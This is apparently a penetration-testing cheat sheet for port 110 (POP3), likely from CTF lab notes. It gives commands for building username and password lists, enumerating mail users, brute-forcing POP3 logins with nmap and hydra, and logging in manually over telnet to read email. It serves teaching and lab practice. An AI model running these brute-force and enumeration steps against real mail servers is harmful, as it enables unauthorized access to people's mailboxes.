Port 110 - Pop3

Check this port only if you need to prioritize this port to be investigated. Often password bruteforcing is time consuming, so check if you can manually login with a username as username and password and read emails.

Guess username and password

nmap -sV --script=pop3-brute <target IP address> 

Create (or reuse) username and password list

# Username
cewl http://postfish.off/team.html --with-numbers --lowercase  -w userlist.txt
wget https://raw.githubusercontent.com/jseidl/usernamer/master/usernamer.py
python usernamer.py -f users_in_team_page -l >> userlist.txt
cat /usr/share/seclists/Usernames/Names/names.txt >> userlist.txt 

# Password 
cat userlist.txt > password.txt
cat /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt >> password.txt

Enumerate users

/usr/share/legion/scripts/smtp-user-enum.pl -U userlist.txt -M VRFY -t -m 64
# -U: user list
# -M: method to use for email verification
# -t: target
# -m: max number of concurrent threads

Bruteforce passwords

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
hydra -l sales -P userlist.txt -f pop3 -V -t 64
# -l: username
# -P: password list
# -f: force to stop once a password is found
# -V: verbose mode
# -t: the number of threads

POP3 commands

USER   	Your user name for this mail server
PASS   	Your password.
QUIT  	 End your session.
STAT   	Number and total size of all messages
LIST   	Message# and size of message
RETR 	message#  Retrieve selected message
DELE 	message#  Delete selected message
NOOP   	No-op. Keeps you connection open.
RSET   	Reset the mailbox. Undelete deleted messages.

Manual login and read emails

# Login 
>telnet <IP> pop3

+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready                                                                                                          
USER ryuu                                                                                                                                                     
PASS ryuu                                                                                                                                                     
+OK Welcome ryuu    

# Retrieve emails
+OK 2 1807                                                                                                                                                    
1 786                                                                                                                                                         
2 1021   

Last updated